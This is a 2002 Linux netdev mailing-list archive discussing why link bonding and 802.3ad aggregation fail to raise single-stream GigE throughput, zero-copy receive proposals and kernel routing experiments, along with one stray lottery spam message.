Errors-to: netdev-bounce@oss.sgi.com X-original-sender: borisp@mc.com Precedence: bulk X-list: netdev

Hi, I have a couple of questions about bonding vs link aggregation in GigE space. I may be doing something wrong on the user level, or there might be system-level issues I am not aware of.

I am trying to increase bandwidth of GigE connections between boxes in my cluster by means of bonding or aggregating several GigE links together.
The simplest setup that I have is two boxes with dual GigE e1000 cards connected to each other directly by means of crossover cables. The boxes are running Red Hat 7.3. I can successfully bond the links; however, I do not see any increase in Netpipe bandwidth compared to the case of a single GigE link. My CPU utilization is around 20%, and I can get ~900 Mbits/sec over a single link (MTU 7500). With bonding, CPU utilization is marginally higher, and there is no increase (or some decrease) in Netpipe numbers. Looking at the ifconfig eth* statistics, I can see that the traffic is distributed evenly between the connections. The cards are plugged into 100 MHz PCI-X 64. Memory bandwidth seems to be sufficient (estimated with "stream" to be ~1200 MB/s). Can anybody offer an explanation?

Another question is about link aggregation. Intel offers a "teaming" option (with the driver and utils) for aggregating the e1000 cards in an EtherChannel- or 802.3ad-compatible way. From the few docs I could find that have any technical merit (802.3ad doc on order), it appears that EtherChannel and 802.3ad impose some sort of Ethernet frame ordering restrictions on the traffic spread across the aggregated links. So, in my case, I can see (ifconfig statistics) that one link is always sending GigE frames, whereas the other link is always receiving. Obviously, in this arrangement, Netpipe will not benefit from the aggregation. A response that I got from Intel customer support indicated that "this is how EtherChannel works". Can someone explain why there are ordering restrictions? If I am not mistaken, TCP/IP would handle out-of-order frames transparently because it is designed to do so.

Thanks in advance for your help,
Boris Protopopov.
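
For illustration of the frame ordering restriction asked about above: one common way for an aggregating sender to avoid reordering is to choose the outgoing link from a hash of the frame's addresses, so that every frame between the same two stations leaves on the same link. The following is only a minimal sketch in C under that assumption; the helper name pick_link and the exact hash (source MAC XOR destination MAC, modulo the number of links) are illustrative and not taken from the e1000 teaming code or from any particular driver.

```c
#include <stddef.h>
#include <stdint.h>

#define ETH_ALEN 6  /* bytes in an Ethernet MAC address */

/*
 * Hypothetical helper: pick the outgoing link for one frame.
 * XOR the source and destination MAC addresses byte by byte, fold the
 * result into a single value and reduce it modulo the number of links.
 * The result depends only on the address pair, so all frames between
 * the same two stations use the same link and cannot overtake each other.
 */
static unsigned int pick_link(const uint8_t src[ETH_ALEN],
                              const uint8_t dst[ETH_ALEN],
                              unsigned int nlinks)
{
    unsigned int hash = 0;
    size_t i;

    for (i = 0; i < ETH_ALEN; i++)
        hash ^= (unsigned int)(src[i] ^ dst[i]);

    /* Guard against an empty link set instead of dividing by zero. */
    return nlinks ? hash % nlinks : 0;
}
```

With a policy of this kind, two directly connected boxes exchange all of their frames in a given direction over a single link, which would be consistent with a single-stream benchmark seeing no gain from the second link.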
From davem@redhat.com Thu Sep 12 16:16:03 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 16:16:07 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8CNG3tG022881 for ; Thu, 12 Sep 2002 16:16:03 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id QAA09747; Thu, 12 Sep 2002 16:12:25 -0700 Date: Thu, 12 Sep 2002 16:12:25 -0700 (PDT) Message-Id: <20020912.161225.20790415.davem@redhat.com> To: hadi@cyberus.ca Cc: todd@osogrande.com, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: References: X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 166 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev

   From: jamal
   Date: Thu, 12 Sep 2002 08:30:44 -0400 (EDT)

   In regards to the receive side CPU utilization improvements: I think
   that NAPI does a good job at least in getting rid of the biggest
   offender -- interrupt overload.

I disagree, at least for bulk receivers. We have no way currently to get rid of the data copy. We desperately need sys_receivefile() and appropriate ops all the way into the networking, then the necessary driver level support to handle the cards that can do this.

Once 10gbit cards start hitting the shelves this will convert from a nice perf improvement into a must have.
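
For illustration, the data copy referred to above is the one a bulk receiver pays when it moves incoming data to a file through a user-space buffer. The sketch below, in C, shows that conventional read()/write() loop. The name copy_stream is hypothetical, and sys_receivefile() is only the interface proposed in this message; the sketch does not call it and makes no assumption about what it would look like.

```c
#include <errno.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: drain in_fd (e.g. a connected socket) into out_fd
 * (e.g. a file) until end of stream. Every byte is copied from the kernel
 * into buf by read() and back into the kernel by write(); this is the
 * per-byte CPU cost a receive-side "receivefile" would aim to remove.
 * Returns the number of bytes transferred, or -1 on error.
 */
static ssize_t copy_stream(int in_fd, int out_fd)
{
    char buf[4096];
    ssize_t total = 0;

    for (;;) {
        ssize_t n, off = 0;

        n = read(in_fd, buf, sizeof(buf));
        if (n == 0)
            break;                      /* end of stream */
        if (n < 0) {
            if (errno == EINTR)
                continue;               /* interrupted, retry the read */
            return -1;
        }

        /* write() may accept fewer bytes than requested, so loop. */
        while (off < n) {
            ssize_t w = write(out_fd, buf + off, (size_t)(n - off));
            if (w < 0) {
                if (errno == EINTR)
                    continue;
                return -1;
            }
            off += w;
        }
        total += n;
    }
    return total;
}
```

On the sending side sendfile() already lets the kernel skip the equivalent user-space bounce; the loop above is what remains for receivers.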
From davem@redhat.com Thu Sep 12 16:38:24 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 16:38:28 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8CNcNtG024051 for ; Thu, 12 Sep 2002 16:38:23 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id QAA10011; Thu, 12 Sep 2002 16:34:47 -0700 Date: Thu, 12 Sep 2002 16:34:47 -0700 (PDT) Message-Id: <20020912.163447.131926830.davem@redhat.com> To: borisp@mc.com Cc: linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation From: "David S. Miller" In-Reply-To: <3D80DF4F.5B218F19@mc.com> References: <3D80DF4F.5B218F19@mc.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 167 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev

Bonding does not help with single stream performance. You have to have multiple apps generating multiple streams of data before you'll realize any improvement. Therefore netpipe is a bad test for what you're doing.

From scott.feldman@intel.com Thu Sep 12 18:25:37 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 18:25:39 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8D1PbtG012004 for ; Thu, 12 Sep 2002 18:25:37 -0700 Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by hermes.jf.intel.com (8.11.6/8.11.6/d: outer.mc,v 1.50 2002/08/30 20:04:57 dmccart Exp $) with ESMTP id g8D1SMb00393 for ; Fri, 13 Sep 2002 01:28:22 GMT Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by petasus.jf.intel.com (8.11.6/8.11.6/d: inner.mc,v 1.24 2002/08/30 20:04:21 dmccart Exp $) with SMTP id g8D1RbZ13787 for ; Fri, 13 Sep 2002 01:27:37 GMT Received: from orsmsx26.jf.intel.com ([192.168.65.26]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2002091218322726457 ; Thu, 12 Sep 2002 18:32:28 -0700 Received: by orsmsx26.jf.intel.com with Internet Mail Service (5.5.2653.19) id ; Thu, 12 Sep 2002 18:30:10 -0700 Message-ID: <288F9BF66CD9D5118DF400508B68C4460475892C@orsmsx113.jf.intel.com> From: "Feldman, Scott" To: "'David S.
Miller'" , borisp@mc.com Cc: linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: RE: bonding vs 802.3ad/Cisco EtherChannel link agregation Date: Thu, 12 Sep 2002 18:30:03 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain X-archive-position: 169 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev

> Bonding does not help with single stream performance.
> You have to have multiple apps generating multiple streams
> of data before you'll realize any improvement.
> Therefore netpipe is a bad test for what you're doing.

The analogy that I like is to imagine a culvert under your driveway and you want to fill up the ditch on the other side, so you stick your garden hose in the culvert. The rate of water flow is good, but you're just not utilizing the volume (bandwidth) of the culvert. So you stick your neighbor's garden hose in the culvert. And so on. Now the ditch is filling up.

So stick a bunch of garden hoses (streams) into that culvert (gigabit) and flood it to the point of saturation, and now measure the efficiency of the system (CPU %). How much CPU is left to do other useful work? The lower the CPU utilization, the higher the efficiency of the system.

Ok, the analogy is corny, and it doesn't have anything to do with bonding, but you'd be surprised how often this question comes up.
-scott From greearb@candelatech.com Thu Sep 12 21:27:09 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 21:27:15 -0700 (PDT) Received: from grok.yi.org (IDENT:GEkpiDvp/zG0zYy2mygVts/3VwYI1kPx@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8D4R7tG031074 for ; Thu, 12 Sep 2002 21:27:08 -0700 Received: from candelatech.com (IDENT:d5ZJJVKmhBenD3qsu+3Ym+pjYtB3inW3@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8D4Vjv25228 for ; Thu, 12 Sep 2002 21:31:45 -0700 Message-ID: <3D816A31.3050401@candelatech.com> Date: Thu, 12 Sep 2002 21:31:45 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "netdev@oss.sgi.com" Subject: more on forcing traffic to route to local interface though another interface. Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 170 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev I've been adding printk's to the linux routing code to try to figure out how things are working... It appears that at least one of the reasons why what I want to do will not work is that this code in route.c: /* * Now we are ready to route packet. */ if ((err = fib_lookup(&key, &res)) != 0) { if (!IN_DEV_FORWARD(in_dev)) goto e_inval; goto no_route; } returns a 'res' that has the res.type == RTN_LOCAL. So, does anyone know what part of the code populates the fib tables? I need to convince that code to never (or rarely) use any RTN_LOCAL type, at least for certain interfaces and/or sockets. Other ideas are welcome, of course! 
Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From greearb@candelatech.com Thu Sep 12 21:55:16 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 21:55:21 -0700 (PDT) Received: from grok.yi.org (IDENT:a8qnlflY4jsR/pcSkPaL0zeQepvPzzpH@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8D4tFtG031702 for ; Thu, 12 Sep 2002 21:55:15 -0700 Received: from candelatech.com (IDENT:G8731805K9ej1swYBLzDlKXXqO/ddURN@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8D4xAv28603; Thu, 12 Sep 2002 21:59:11 -0700 Message-ID: <3D81709E.7040506@candelatech.com> Date: Thu, 12 Sep 2002 21:59:10 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: kuznet@ms2.inr.ac.ru CC: Rusty Russell , netdev@oss.sgi.com, anton@samba.org Subject: Re: "Loopback" route through two cards? References: <200209031254.QAA02008@sex.inr.ac.ru> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 171 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev kuznet@ms2.inr.ac.ru wrote: > Hello! > > >> I know this is an FAQ, but I never saw an answer I liked. > > > And what kind of answers do you like? :-) > > >>still impossible > > > It depends on sense which you put to "impossible". > > There are two problems with this: > > 1. You cannot send to local address via any device but loopback. > > The only way to override this is to use explicit SO_BINDTODEVICE > on sending socket. Hence, it is "impossible" not changing application. Ooooh, this looks like what I'm looking for... > > 2. 
You cannot receive packets with local address from any device > but loopback. > > This is impossible, but wthis time without not editing kernel, > removing the check for local addresses in fib_validate_source(). Any clues to which part of this method needs to be changed? I see nothing obviously about checking for local IPs, but I'm sure it's in there somewhere! Thanks, Ben > > Alexey > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From greearb@candelatech.com Thu Sep 12 22:39:38 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 22:39:44 -0700 (PDT) Received: from grok.yi.org (IDENT:TP7xcPVmgHSF0IccBRFMbNRdlgl/Xy3X@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8D5dbtG001475 for ; Thu, 12 Sep 2002 22:39:38 -0700 Received: from candelatech.com (IDENT:pmrf0NL+shKkAYlF7IKxcS3CBv4nvcBe@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8D5iEv04817; Thu, 12 Sep 2002 22:44:14 -0700 Message-ID: <3D817B2E.7020207@candelatech.com> Date: Thu, 12 Sep 2002 22:44:14 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Ben Greear CC: netdev@oss.sgi.com Subject: Re: "Loopback" route through two cards? References: <200209031254.QAA02008@sex.inr.ac.ru> <3D81709E.7040506@candelatech.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 172 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Ben Greear wrote: > kuznet@ms2.inr.ac.ru wrote: >> 2. You cannot receive packets with local address from any device >> but loopback. 
>> >> This is impossible, but wthis time without not editing kernel, >> removing the check for local addresses in fib_validate_source(). > > > Any clues to which part of this method needs to be changed? I see nothing > obviously about checking for local IPs, but I'm sure it's in there > somewhere! So, after adding printk's everywhere, I see that this seems to be the check that fails: if (res.type != RTN_UNICAST) { printk("fib_frontend: was not UNICAST: %x\n", res.type); //goto e_inval_res; } After commenting that out, I can send pkts in one direction, but in the other direction, the ARP is not ever answered (I see it sent with ethereal). It appears that the only reason it goes in one direction is that I got lucky and the arp table had the entry for some reason. So, I have to figure out how to make ARP work in this case, and I think it will all start working! Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From swaters@amicus.com Fri Sep 13 07:02:18 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 13 Sep 2002 07:02:20 -0700 (PDT) Received: from nsmaster.amicus.com (nsmaster.amicus.com [208.134.129.10]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8DE2HtG011456 for ; Fri, 13 Sep 2002 07:02:18 -0700 Received: from localhost.localdomain (swaters.amicus.com [208.134.129.75]) by nsmaster.amicus.com (8.12.1/8.12.1) with ESMTP id g8DE6rjq010855 for ; Fri, 13 Sep 2002 09:06:53 -0500 Subject: RFC 3041 From: Stephen Waters To: "netdev@oss.sgi.com" Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-/H9ngCvpBUv9vfTJAZF9" X-Mailer: Ximian Evolution 1.0.8 Date: 13 Sep 2002 09:06:53 -0500 Message-Id: <1031926014.6546.4.camel@swaters> Mime-Version: 1.0 X-RAVMilter-Version: 8.3.0(snapshot 20010925) (nsmaster.amicus.com) X-archive-position: 173 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: 
netdev-bounce@oss.sgi.com X-original-sender: swaters@amicus.com Precedence: bulk X-list: netdev --=-/H9ngCvpBUv9vfTJAZF9 Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Anyone know of any plans or code for implementing RFC 3041 "Privacy Extensions for Stateless Address Autoconfiguration in IPv6" on Linux? Thanks, -s --=-/H9ngCvpBUv9vfTJAZF9 Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQA9gfD9vSyJ32tBS68RArs8AJ9OigQ24bTipdBuAuuBKLRUoKga0wCeO7xK tYettrxCEcdbDBDNUtqcqpk= =6elv -----END PGP SIGNATURE----- --=-/H9ngCvpBUv9vfTJAZF9-- From cfriesen@nortelnetworks.com Fri Sep 13 07:24:58 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 13 Sep 2002 07:26:00 -0700 (PDT) Received: from zcars04e.ca.nortel.com (zcars04e.nortelnetworks.com [47.129.242.56]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8DEOwtG012123 for ; Fri, 13 Sep 2002 07:24:58 -0700 Received: from zcard307.ca.nortel.com (americasm01.nt.com [47.129.242.67]) by zcars04e.ca.nortel.com (Switch-2.2.0/Switch-2.2.0) with ESMTP id g8DETSF17085; Fri, 13 Sep 2002 10:29:28 -0400 (EDT) Received: from zcard0k6.ca.nortel.com ([47.129.242.158]) by zcard307.ca.nortel.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id SK2MN54L; Fri, 13 Sep 2002 10:29:32 -0400 Received: from pcard0ks.ca.nortel.com ([47.129.117.131]) by zcard0k6.ca.nortel.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id RDHYHSVQ; Fri, 13 Sep 2002 10:29:32 -0400 Received: from nortelnetworks.com (localhost.localdomain [127.0.0.1]) by pcard0ks.ca.nortel.com (Postfix) with ESMTP id 354232E12E; Fri, 13 Sep 2002 10:29:31 -0400 (EDT) Message-ID: <3D81F64B.11182FB1@nortelnetworks.com> Date: Fri, 13 Sep 2002 10:29:31 -0400 X-Sybari-Space: 00000000 00000000 00000000 From: Chris Friesen X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 
2.4.18-6mdkenterprise i686) X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" Cc: linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation References: <3D80DF4F.5B218F19@mc.com> <20020912.163447.131926830.davem@redhat.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 174 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cfriesen@nortelnetworks.com Precedence: bulk X-list: netdev "David S. Miller" wrote: > > Bonding does not help with single stream performance. > You have to have multiple apps generating multiple streams > of data before you'll realize any improvement. > Therefore netpipe is a bad test for what you're doing. This has always confused me. Why doesn't the bonding driver try and spread all the traffic over all the links? This would allow for a single stream to use the full aggregate bandwidth of all bonded links. Chris From borisp@mc.com Fri Sep 13 07:45:58 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 13 Sep 2002 07:46:03 -0700 (PDT) Received: from mc.com (iris.mc.com [192.233.16.119]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8DEjvtG012688 for ; Fri, 13 Sep 2002 07:45:57 -0700 Received: from mc.com by mc.com (8.8.8+Sun/SMI-SVR4) id KAA11863; Fri, 13 Sep 2002 10:50:12 -0400 (EDT) Message-ID: <3D81FB23.EEBD371C@mc.com> Date: Fri, 13 Sep 2002 10:50:11 -0400 From: Boris Protopopov Organization: Mercury Computer Systems, Inc. X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: "Feldman, Scott" CC: "'David S. 
Miller'" , linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation References: <288F9BF66CD9D5118DF400508B68C4460475892C@orsmsx113.jf.intel.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 175 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: borisp@mc.com Precedence: bulk X-list: netdev

Hi, Scott, David,

thanks for your replies. I agree that bonding does not seem to help with a single connection (btw, is this a single TCP connection, or an ordered pair of IP addresses, or an ordered pair of MAC addresses?). My question is: why?

Scott, I am not sure I understand your analogy. It seems that you suggest that I cannot saturate GigE with a single hose (a single Netpipe connection, I am guessing). My experiments, however, indicate that I can - I get ~900Mbits/sec out of 1000Mbits/sec with 20% CPU utilization when I use a single Netpipe connection. I am guessing the ~10% underutilization is caused by the protocol overheads (headers/trailers).

I added another GigE link, bonded it with the first one, and repeated the experiment. I saw the ethernet frames evenly distributed between the two links (ifconfig statistics), which, in my opinion, indicated that a single Netpipe connection was in fact using both links. The CPU utilization rose a bit, but it was nowhere near even 50%. The memory subsystem seems to be able to handle over 1000Mbytes/sec, the peripheral bus is 100Mhz 64-bit PCI-X (handles 800Mbytes/sec). So, obviously, there is a bottleneck somewhere, but I don't understand where. I think my CPU/memory/I/O hose is big enough to fill up two GigE links (~200Mbytes/sec), however, this is not happening. My question is: why?
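As a rough check on the overhead guess and the bus figure above, the arithmetic can be sketched in a few lines of Python. This is only an estimate under stated assumptions: standard Ethernet framing with a 1500-byte MTU, back-to-back full-size frames, and 20-byte IP and TCP headers (optionally plus 12 bytes of TCP timestamp option). The function names are made up for illustration and do not come from Netpipe or the bonding driver.

```python
# Per-frame bytes on the wire that are not part of the IP packet:
# preamble + SFD (8), Ethernet header (14), FCS (4), inter-frame gap (12).
ETH_OVERHEAD = 8 + 14 + 4 + 12


def tcp_goodput_mbps(link_mbps, mtu=1500, ip_hdr=20, tcp_hdr=20, tcp_opts=0):
    """Upper bound on TCP payload rate for back-to-back full-size frames."""
    payload = mtu - ip_hdr - tcp_hdr - tcp_opts
    on_wire = mtu + ETH_OVERHEAD
    return link_mbps * payload / on_wire


def bus_mbytes_per_sec(width_bits, clock_mhz):
    """Theoretical peak of a parallel bus moving one word per clock."""
    return width_bits / 8 * clock_mhz


if __name__ == "__main__":
    print(round(tcp_goodput_mbps(1000), 1))               # no TCP options
    print(round(tcp_goodput_mbps(1000, tcp_opts=12), 1))  # with timestamps
    print(bus_mbytes_per_sec(64, 100))                    # 64-bit bus at 100 MHz
```

Under these assumptions framing and headers cost roughly 5 to 6 percent of the line rate, so they would explain only part of a ~10% shortfall, and the 800Mbytes/sec bus figure is simply 8 bytes per clock at 100 MHz.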
I know why this happens when I use teaming: because, on each side, one GigE link is dedicated to sending, and the other one - to receiving (again, I use ifconfig statistics to see what's happening). According to what I was told, this is because 802.3ad and EtherChannel insist that all GigE frames that belong to a "conversation" (I was unable to find a technical definition of the "conversation" so far) are delivered in order. I would like to understand what a "conversation" is, and why TCP/IP could not handle out-of-order delivery in its usual manner. I am guessing it is because it would be too slow or would incur too much CPU overhead. I was wondering if someone knew for sure :)

Thanks again, hope to get more opinions (it seems I am not alone :)),
Boris.

"Feldman, Scott" wrote:
>
> > Bonding does not help with single stream performance.
> > You have to have multiple apps generating multiple streams
> > of data before you'll realize any improvement.
> > Therefore netpipe is a bad test for what you're doing.
>
> The analogy that I like is to imagine a culvert under your driveway and you
> want to fill up the ditch on the other side, so you stick your garden hose
> in the culvert. The rate of water flow is good, but you're just not
> utilizing the volume (bandwidth) of the culvert. So you stick your
> neighbors garden hose in the culvert. And so on. Now the ditch is filling
> up.
>
> So stick a bunch of garden hoses (streams) into that culvert (gigabit) and
> flood it to the point of saturation, and now measure the efficiency of the
> system (CPU %) How much CPU is left to do other useful work? The lower the
> CPU utilization, the higher the efficiency of the system.
>
> Ok, the analogy is corny, and it doesn't have anything to do with bonding,
> but you'd be surprise how often this question comes up.
> > -scott > - > To unsubscribe from this list: send the line "unsubscribe linux-net" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html From respuesta@lapromocion.com Fri Sep 13 13:55:56 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 13 Sep 2002 13:55:57 -0700 (PDT) Received: from lapromocion.com ([200.68.135.70]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8DKtotG025589 for ; Fri, 13 Sep 2002 13:55:53 -0700 Received: from operador.lapromocion.com ([200.68.135.70]) by lapromocion.com ([200.68.135.70]) with SMTP (MDaemon.PRO.v6.0.6.T) for ; Fri, 13 Sep 2002 15:35:26 -0500 Message-Id: <5.1.0.14.0.20020913090823.03ec9920@200.68.135.70> X-Sender: webpro@200.68.135.70 (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1 X-Priority: 1 (Highest) Date: Fri, 13 Sep 2002 11:15:39 -0500 To: webmaster@lapromocion.com From: El Mensajero Millonario Subject: US$ 6 Millones!!! Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-MDRemoteIP: 200.68.135.70 X-Return-Path: respuesta@lapromocion.com X-MDaemon-Deliver-To: netdev@oss.sgi.com X-archive-position: 176 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: webmaster@lapromocion.com Precedence: bulk X-list: netdev El Mensajero Millonario Increíble!!! 
The Florida LOTTO jackpot has rolled over again and this Saturday, September 14, it will play for US$ 6 MILLION....If you want to buy a ticket, do it right now using the courier services of www.elmensajeromillonario.com www.elmensajeromillonario.com buys the Florida LOTTO for you and sends it to you via email every week.......Want to know how it works? It is very easy, just click here *****IF YOU WISH TO BE REMOVED FROM OUR DATABASE, CLICK HERE*****

From todd-lkml@osogrande.com Fri Sep 13 14:57:08 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 13 Sep 2002 14:57:12 -0700 (PDT) Received: from puerco.nm.org (puerco.nm.org [129.121.1.22]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8DLv8tG027360 for ; Fri, 13 Sep 2002 14:57:08 -0700 Received: (qmail 83764 invoked from network); 13 Sep 2002 21:58:05 -0000 Received: from unknown (HELO gallinas) (129.121.5.22) by puerco.nm.org with SMTP; 13 Sep 2002 21:58:05 -0000 Date: Fri, 13 Sep 2002 15:59:15 -0600 (MDT) From: todd-lkml@osogrande.com X-X-Sender: todd@gp Reply-To: linux-kernel@vger.kernel.org To: "David S. Miller" cc: "hadi@cyberus.ca" , "tcw@tempest.prismnet.com" , "linux-kernel@vger.kernel.org" , "netdev@oss.sgi.com" , patricia gilfeather Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <20020912.161225.20790415.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 177 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: todd-lkml@osogrande.com Precedence: bulk X-list: netdev

dave, all,

On Thu, 12 Sep 2002, David S. Miller wrote:

> I disagree, at least for bulk receivers. We have no way currently to
> get rid of the data copy. We desperately need sys_receivefile() and
> appropriate ops all the way into the networking, then the necessary
> driver level support to handle the cards that can do this.
not sure i understand what you're proposing, but while we're at it, why not also make the api for apps to allocate a buffer in userland that (for nics that support it) the nic can dma directly into? it seems likely notification that the buffer was used would have to travel through the kernel, but it would be nice to save the interrupts altogether. this may be exactly what you were saying. > > Once 10gbit cards start hitting the shelves this will convert from a > nice perf improvement into a must have. totally agreed. this is a must for high-performance computing now (since who wants to waste 80-100% of their CPU just running the network)? t. -- todd underwood, vp & cto oso grande technologies, inc. todd@osogrande.com "Those who give up essential liberties for temporary safety deserve neither liberty nor safety." - Benjamin Franklin From niv@us.ibm.com Fri Sep 13 15:08:23 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 13 Sep 2002 15:08:27 -0700 (PDT) Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8DM8MtG027786 for ; Fri, 13 Sep 2002 15:08:23 -0700 Received: from northrelay01.pok.ibm.com (northrelay01.pok.ibm.com 